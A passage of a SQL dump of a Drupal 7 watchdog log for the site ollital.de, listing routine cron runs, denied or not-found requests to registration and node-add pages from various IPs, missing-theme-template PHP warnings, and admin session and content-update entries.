found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','216.231.140.42',1443103534),(1983,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','216.231.140.42',1443103546),(1984,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','93.159.230.88',1443117687),(1985,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=taxonomy/term/1','','85.214.48.99',1443139538),(1986,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=rss.xml','','65.19.138.34',1443162705),(1987,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','https://ollital.de/cms/','107.23.45.196',1443188590),(1988,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','185.8.107.176',1443193122),(1989,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','185.8.107.176',1443193124),(1990,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','185.8.107.176',1443193128),(1991,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','89.248.171.137',1443212856),(1992,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','68.180.230.190',1443240485),(1993,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=node/','','117.18.73.46',1443266997),(1994,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','117.18.73.46',1443266998),(1995,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','117.18.73.46',1443267001),(1996,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','117.18.73.46',1443267013),(1997,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=rss.xml','','68.180.230.190',1443302476),(1998,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','216.231.140.42',1443321297),(1999,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','216.231.140.42',1443321299),(2000,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','216.231.140.42',1443321344),(2001,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','148.251.124.42',1443324522),(2002,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=user','','66.249.67.13',1443346927),(2003,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','68.180.230.190',1443369131),(2004,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','216.231.140.42',1443378867),(2005,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/4','','68.180.230.190',1443392604),(2006,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','68.180.230.190',1443417030),(2007,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','206.221.178.210',1443436467),(2008,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','206.221.178.210',1443436469),(2009,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','206.221.178.210',1443436475),(2010,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=rss.xml','','65.19.138.34',1443442106),(2011,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/3','','89.163.148.58',1443463951),(2012,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','68.180.230.190',1443491589),(2013,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','41.223.52.10',1443494800),(2014,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','41.223.52.10',1443494802),(2015,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','41.223.52.10',1443494811),(2016,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','66.249.75.42',1443513810),(2017,0,'cron','Cron run completed.','a:0:{}',5,'','http://t9s.info/cms/?q=node/3','','207.46.13.137',1443538088),(2018,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','216.231.140.42',1443555738),(2019,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','216.231.140.42',1443555742),(2020,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','http://t9s.info/','62.212.73.49',1443569950),(2021,0,'page not found','node/2','N;',4,'','http://www.ollital.de/cms/?q=node/2','','66.249.67.190',1443587614),(2022,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=rss.xml','','65.19.138.34',1443594728),(2023,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=node/','','168.1.99.220',1443618382),(2024,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','168.1.99.220',1443618384),(2025,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','168.1.99.220',1443618387),(2026,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','168.1.99.220',1443618399),(2027,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','199.58.86.206',1443642803),(2028,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=user/password','','68.180.230.190',1443664629),(2029,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','217.12.199.189',1443678745),(2030,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','217.12.199.189',1443678747),(2031,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','217.12.199.189',1443678752),(2032,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','http://www.uptime.com','67.55.73.76',1443688372),(2033,1,'content','@type: updated %title.','a:2:{s:5:\"@type\";s:7:\"article\";s:6:\"%title\";s:7:\"Termine\";}',5,'view','https://ollital.de/cms/?q=node%2F4%2Fedit&render=overlay&render=overlay','https://ollital.de/cms/?q=node%2F4%2Fedit&render=overlay','195.128.40.90',1443693775),(2034,0,'cron','Cron run completed.','a:0:{}',5,'','http://t9s.info/cms/?q=user/password','','157.55.39.178',1443710151),(2035,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','68.180.230.190',1443732055),(2036,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','216.231.140.42',1443741882),(2037,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','216.231.140.42',1443741886),(2038,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','61.238.246.130',1443741900),(2039,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=taxonomy/term/1','','62.210.148.247',1443753785),(2040,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/7','','68.180.230.190',1443782889),(2041,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=user/login&destination=node/3%23comment-form','','68.180.230.190',1443807147),(2042,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','74.221.214.106',1443811674),(2043,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','74.221.214.106',1443811678),(2044,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','74.221.214.106',1443811688),(2045,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','141.8.147.2',1443830870),(2046,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','198.12.153.239',1443852518),(2047,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=rss.xml','','65.19.138.33',1443874136),(2048,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','192.99.168.52',1443885332),(2049,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','192.99.168.52',1443885338),(2050,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','216.231.140.42',1443885353),(2051,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/5','','68.180.230.190',1443897448),(2052,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/4','','68.180.230.190',1443926683),(2053,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','66.249.67.6',1443949271),(2054,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','37.235.49.84',1443968578),(2055,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','37.235.49.84',1443968582),(2056,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','37.235.49.84',1443968592),(2057,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=rss.xml','','68.180.230.190',1443979936),(2058,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','141.8.147.25',1444002806),(2059,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/7','','68.180.230.190',1444026495),(2060,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','195.128.40.90',1444049247),(2061,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','109.123.122.214',1444054196),(2062,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','109.123.122.214',1444054200),(2063,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','109.123.122.214',1444054209),(2064,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','176.9.10.227',1444073119),(2065,0,'cron','Cron run completed.','a:0:{}',5,'','http://t9s.info/cms/?q=node/4','','157.55.39.79',1444098202),(2066,0,'cron','Cron run completed.','a:0:{}',5,'','http://ollital.de/cms/?q=user/password','','66.249.67.83',1444120985),(2067,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','148.81.130.23',1444141917),(2068,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','148.81.130.23',1444141923),(2069,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','148.81.130.23',1444141941),(2070,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','66.249.67.6',1444142836),(2071,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','68.180.230.190',1444165177),(2072,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','http://www.t9s.info/','180.153.236.67',1444189219),(2073,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','141.8.141.147',1444212942),(2074,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=node/','','182.92.156.212',1444234582),(2075,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','182.92.156.212',1444234585),(2076,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','182.92.156.212',1444234589),(2077,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','182.92.156.212',1444234609),(2078,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=user','','66.249.78.188',1444256790),(2079,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','68.180.230.190',1444281109),(2080,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','46.4.116.197',1444305225),(2081,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','216.231.140.42',1444335234),(2082,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=user/register','','216.231.140.42',1444335238),(2083,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','192.81.130.110',1444335248),(2084,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','192.81.130.110',1444335271),(2085,0,'cron','Cron run completed.','a:0:{}',5,'','http://t9s.info/cms/?q=node/3','','157.55.39.145',1444359804),(2086,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/','','157.55.39.79',1444381549),(2087,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','159.203.82.141',1444416018),(2088,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','157.55.39.54',1444440050),(2089,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','216.231.140.42',1444443606),(2090,0,'cron','Cron run completed.','a:0:{}',5,'','http://ollital.de/cms/?q=rss.xml','','51.254.131.245',1444468435),(2091,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/5','','188.165.15.230',1444490079),(2092,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','46.4.120.3',1444522147),(2093,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=rss.xml','','65.19.138.33',1444545182),(2094,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','151.236.5.242',1444547702),(2095,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','151.236.5.242',1444547708),(2096,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','185.8.107.176',1444547727),(2097,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','141.8.142.1',1444569965),(2098,0,'cron','Cron run completed.','a:0:{}',5,'','http://ollital.de/cms/?q=taxonomy/term/1','','195.154.200.68',1444593187),(2099,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','212.83.183.109',1444618537),(2100,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/7','','66.249.78.195',1444642127),(2101,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','202.39.238.28',1444654195),(2102,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','216.231.140.42',1444654203),(2103,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','163.53.244.119',1444654232),(2104,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=taxonomy/term/2','','66.249.78.195',1444668497),(2105,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','204.12.241.170',1444693625),(2106,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=rss.xml','','65.19.138.33',1444717997),(2107,0,'cron','Cron run completed.','a:0:{}',5,'','http://ollital.de/cms/?q=taxonomy/term/3/feed','','91.121.112.142',1444743644),(2108,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','103.25.58.23',1444764528),(2109,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','103.25.58.23',1444764536),(2110,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','216.231.140.42',1444764561),(2111,0,'cron','Cron run completed.','a:0:{}',5,'','http://ollital.de/cms/','','176.9.10.227',1444770568),(2112,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','68.180.230.190',1444794839),(2113,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','195.128.40.90',1444821067),(2114,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=taxonomy/term/3/feed','','62.210.90.118',1444845203),(2115,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=user/login&destination=node/4%23comment-form','','68.180.229.241',1444867435),(2116,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','213.183.56.210',1444887392),(2117,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','213.183.56.210',1444887399),(2118,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','216.231.140.42',1444887420),(2119,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=rss.xml','','65.19.138.34',1444890808),(2120,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','213.136.68.62',1444924786),(2121,0,'php','%type: !message in %function (line %line of %file).','a:6:{s:5:\"%type\";s:7:\"Warning\";s:8:\"!message\";s:137:\"include(/var/www/drupal-7.40/sites/all/themes/responsive_bartik/templates/page.tpl.php): failed to open stream: No such file or directory\";s:9:\"%function\";s:23:\"theme_render_template()\";s:5:\"%file\";s:39:\"/var/www/drupal-7.40/includes/theme.inc\";s:5:\"%line\";i:1525;s:14:\"severity_level\";i:4;}',4,'','https://ollital.de/cms/','','5.147.41.205',1444939782),(2122,0,'php','%type: !message in %function (line %line of %file).','a:6:{s:5:\"%type\";s:7:\"Warning\";s:8:\"!message\";s:170:\"include(): Failed opening \'/var/www/drupal-7.40/sites/all/themes/responsive_bartik/templates/page.tpl.php\' for inclusion (include_path=\'.:/usr/share/php:/usr/share/pear\')\";s:9:\"%function\";s:23:\"theme_render_template()\";s:5:\"%file\";s:39:\"/var/www/drupal-7.40/includes/theme.inc\";s:5:\"%line\";i:1525;s:14:\"severity_level\";i:4;}',4,'','https://ollital.de/cms/','','5.147.41.205',1444939782),(2123,0,'php','%type: !message in %function (line %line of %file).','a:6:{s:5:\"%type\";s:7:\"Warning\";s:8:\"!message\";s:137:\"include(/var/www/drupal-7.40/sites/all/themes/responsive_bartik/templates/node.tpl.php): failed to open stream: No such file or directory\";s:9:\"%function\";s:23:\"theme_render_template()\";s:5:\"%file\";s:39:\"/var/www/drupal-7.40/includes/theme.inc\";s:5:\"%line\";i:1525;s:14:\"severity_level\";i:4;}',4,'','https://ollital.de/cms/','','5.147.41.205',1444939782),(2124,0,'php','%type: !message in %function (line %line of %file).','a:6:{s:5:\"%type\";s:7:\"Warning\";s:8:\"!message\";s:170:\"include(): Failed opening \'/var/www/drupal-7.40/sites/all/themes/responsive_bartik/templates/node.tpl.php\' for inclusion (include_path=\'.:/usr/share/php:/usr/share/pear\')\";s:9:\"%function\";s:23:\"theme_render_template()\";s:5:\"%file\";s:39:\"/var/www/drupal-7.40/includes/theme.inc\";s:5:\"%line\";i:1525;s:14:\"severity_level\";i:4;}',4,'','https://ollital.de/cms/','','5.147.41.205',1444939782),(2125,0,'php','%type: !message in %function (line %line of %file).','a:6:{s:5:\"%type\";s:7:\"Warning\";s:8:\"!message\";s:137:\"include(/var/www/drupal-7.40/sites/all/themes/responsive_bartik/templates/html.tpl.php): failed to open stream: No such file or directory\";s:9:\"%function\";s:23:\"theme_render_template()\";s:5:\"%file\";s:39:\"/var/www/drupal-7.40/includes/theme.inc\";s:5:\"%line\";i:1525;s:14:\"severity_level\";i:4;}',4,'','https://ollital.de/cms/','','5.147.41.205',1444939782),(2126,0,'php','%type: !message in %function (line %line of %file).','a:6:{s:5:\"%type\";s:7:\"Warning\";s:8:\"!message\";s:170:\"include(): Failed opening \'/var/www/drupal-7.40/sites/all/themes/responsive_bartik/templates/html.tpl.php\' for inclusion (include_path=\'.:/usr/share/php:/usr/share/pear\')\";s:9:\"%function\";s:23:\"theme_render_template()\";s:5:\"%file\";s:39:\"/var/www/drupal-7.40/includes/theme.inc\";s:5:\"%line\";i:1525;s:14:\"severity_level\";i:4;}',4,'','https://ollital.de/cms/','','5.147.41.205',1444939782),(2127,0,'php','%type: !message in %function (line %line of %file).','a:6:{s:5:\"%type\";s:7:\"Warning\";s:8:\"!message\";s:137:\"include(/var/www/drupal-7.40/sites/all/themes/responsive_bartik/templates/page.tpl.php): failed to open stream: No such file or directory\";s:9:\"%function\";s:23:\"theme_render_template()\";s:5:\"%file\";s:39:\"/var/www/drupal-7.40/includes/theme.inc\";s:5:\"%line\";i:1525;s:14:\"severity_level\";i:4;}',4,'','https://ollital.de/cms/','','5.147.41.205',1444939854),(2128,0,'php','%type: !message in %function (line %line of %file).','a:6:{s:5:\"%type\";s:7:\"Warning\";s:8:\"!message\";s:170:\"include(): Failed opening \'/var/www/drupal-7.40/sites/all/themes/responsive_bartik/templates/page.tpl.php\' for inclusion (include_path=\'.:/usr/share/php:/usr/share/pear\')\";s:9:\"%function\";s:23:\"theme_render_template()\";s:5:\"%file\";s:39:\"/var/www/drupal-7.40/includes/theme.inc\";s:5:\"%line\";i:1525;s:14:\"severity_level\";i:4;}',4,'','https://ollital.de/cms/','','5.147.41.205',1444939855),(2129,0,'php','%type: !message in %function (line %line of %file).','a:6:{s:5:\"%type\";s:7:\"Warning\";s:8:\"!message\";s:137:\"include(/var/www/drupal-7.40/sites/all/themes/responsive_bartik/templates/node.tpl.php): failed to open stream: No such file or directory\";s:9:\"%function\";s:23:\"theme_render_template()\";s:5:\"%file\";s:39:\"/var/www/drupal-7.40/includes/theme.inc\";s:5:\"%line\";i:1525;s:14:\"severity_level\";i:4;}',4,'','https://ollital.de/cms/','','5.147.41.205',1444939855),(2130,0,'php','%type: !message in %function (line %line of %file).','a:6:{s:5:\"%type\";s:7:\"Warning\";s:8:\"!message\";s:170:\"include(): Failed opening \'/var/www/drupal-7.40/sites/all/themes/responsive_bartik/templates/node.tpl.php\' for inclusion (include_path=\'.:/usr/share/php:/usr/share/pear\')\";s:9:\"%function\";s:23:\"theme_render_template()\";s:5:\"%file\";s:39:\"/var/www/drupal-7.40/includes/theme.inc\";s:5:\"%line\";i:1525;s:14:\"severity_level\";i:4;}',4,'','https://ollital.de/cms/','','5.147.41.205',1444939855),(2131,0,'php','%type: !message in %function (line %line of %file).','a:6:{s:5:\"%type\";s:7:\"Warning\";s:8:\"!message\";s:137:\"include(/var/www/drupal-7.40/sites/all/themes/responsive_bartik/templates/html.tpl.php): failed to open stream: No such file or directory\";s:9:\"%function\";s:23:\"theme_render_template()\";s:5:\"%file\";s:39:\"/var/www/drupal-7.40/includes/theme.inc\";s:5:\"%line\";i:1525;s:14:\"severity_level\";i:4;}',4,'','https://ollital.de/cms/','','5.147.41.205',1444939855),(2132,0,'php','%type: !message in %function (line %line of %file).','a:6:{s:5:\"%type\";s:7:\"Warning\";s:8:\"!message\";s:170:\"include(): Failed opening \'/var/www/drupal-7.40/sites/all/themes/responsive_bartik/templates/html.tpl.php\' for inclusion (include_path=\'.:/usr/share/php:/usr/share/pear\')\";s:9:\"%function\";s:23:\"theme_render_template()\";s:5:\"%file\";s:39:\"/var/www/drupal-7.40/includes/theme.inc\";s:5:\"%line\";i:1525;s:14:\"severity_level\";i:4;}',4,'','https://ollital.de/cms/','','5.147.41.205',1444939855),(2133,1,'user','Session opened for %name.','a:1:{s:5:\"%name\";s:4:\"Olli\";}',5,'','https://ollital.de/cms/?q=node&destination=node','https://ollital.de/cms/','5.147.41.205',1444940118),(2134,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','157.55.39.197',1444957999),(2135,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','66.249.69.66',1444986081),(2136,1,'user','Session opened for %name.','a:1:{s:5:\"%name\";s:4:\"Olli\";}',5,'','https://ollital.de/cms/?q=node&destination=node','https://ollital.de/cms/','195.128.40.90',1444986130),(2137,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','66.249.67.182',1445009262),(2138,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','216.231.140.42',1445010704),(2139,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','216.231.140.42',1445010713),(2140,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','162.210.196.97',1445032001),(2141,0,'cron','Cron run completed.','a:0:{}',5,'','http://ollital.de/cms/?q=user','','79.143.178.116',1445059728),(2142,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','68.180.230.190',1445082356),(2143,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=node/','','216.231.140.42',1445104318),(2144,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','216.231.140.42',1445104321),(2145,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','216.231.140.42',1445104328),(2146,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','216.231.140.42',1445104350),(2147,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=user/login&destination=node/3%23comment-form','','68.180.230.190',1445127147),(2148,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=rss.xml','','65.19.138.34',1445150021),(2149,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=taxonomy/term/2/feed','','68.180.230.190',1445171669),(2150,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','81.209.177.145',1445194896),(2151,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=taxonomy/term/3','','188.165.15.201',1445218803),(2152,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=node/','','216.231.140.42',1445242410),(2153,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','216.231.140.42',1445242415),(2154,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','216.231.140.42',1445242423),(2155,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','216.231.140.42',1445242449),(2156,0,'access denied','user/1','N;',4,'','https://ollital.de/cms/?q=user/1','','81.209.177.155',1445257195),(2157,1,'content','@type: updated %title.','a:2:{s:5:\"@type\";s:7:\"article\";s:6:\"%title\";s:7:\"Termine\";}',5,'view','https://ollital.de/cms/?q=node%2F4%2Fedit&render=overlay&render=overlay','https://ollital.de/cms/?q=node%2F4%2Fedit&render=overlay','195.128.40.90',1445260042),(2158,0,'cron','Cron run completed.','a:0:{}',5,'','http://ollital.de/cms/?q=user','','208.115.113.93',1445264194),(2159,0,'cron','Cron run completed.','a:0:{}',5,'','http://ollital.de/cms/?q=node/6','','208.115.111.74',1445287460),(2160,0,'cron','Cron run completed.','a:0:{}',5,'','http://t9s.info/cms/?q=node/5','','157.55.39.162',1445311400),(2161,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','188.138.9.50',1445335077),(2162,0,'cron','Cron run completed.','a:0:{}',5,'','http://ollital.de/cms/?q=user/login&destination=node/3%23comment-form','','62.210.172.115',1445356897),(2163,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','216.231.140.42',1445396729),(2164,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=user/register','','216.231.140.42',1445396732),(2165,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/5','https://ollital.de/','176.36.52.108',1445418404),(2166,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/','','207.46.13.178',1445443988),(2167,0,'cron','Cron run completed.','a:0:{}',5,'','http://t9s.info/cms/?q=node/7','','157.55.39.152',1445473450),(2168,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=rss.xml','','65.19.138.33',1445495728),(2169,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','66.249.67.173',1445518228),(2170,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','87.250.244.1',1445543405),(2171,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','46.229.170.197',1445566235),(2172,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','207.46.13.178',1445589831),(2173,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','157.55.39.243',1445624729),(2174,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','213.171.199.22',1445648378),(2175,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','http://www.google.de/','213.61.218.52',1445675420),(2176,1,'user','Session opened for %name.','a:1:{s:5:\"%name\";s:4:\"Olli\";}',5,'','https://ollital.de/cms/?q=node/6&destination=node/6','https://ollital.de/cms/?q=node/6','89.207.251.65',1445691032),(2177,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','148.251.232.166',1445713035),(2178,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','http://whois.domaintools.com/t9s.info','64.246.165.140',1445736194),(2179,0,'access denied','user/register','N;',4,'','http://www.ollital.de/cms/?q=user/register','','192.95.15.24',1445739772),(2180,0,'page not found','user/user/register','N;',4,'','http://www.ollital.de/cms/?q=user/user/register','','192.95.15.24',1445739787),(2181,0,'access denied','node/add','N;',4,'','http://www.ollital.de/cms/?q=node/add','','107.160.13.34',1445739836),(2182,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','202.46.53.146',1445759003),(2183,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','','198.12.153.239',1445783380),(2184,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=user/password','','66.249.64.137',1445806196),(2185,0,'cron','Cron run completed.','a:0:{}',5,'','http://www.ollital.de/cms/?q=rss.xml','','65.19.138.33',1445841361),(2186,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/?q=node/3','','66.249.64.141',1445863078),(2187,0,'cron','Cron run completed.','a:0:{}',5,'','https://ollital.de/cms/','https://ollital.de/cms','37.1.202.50',1445886087),(2188,0,'cron','Cron run 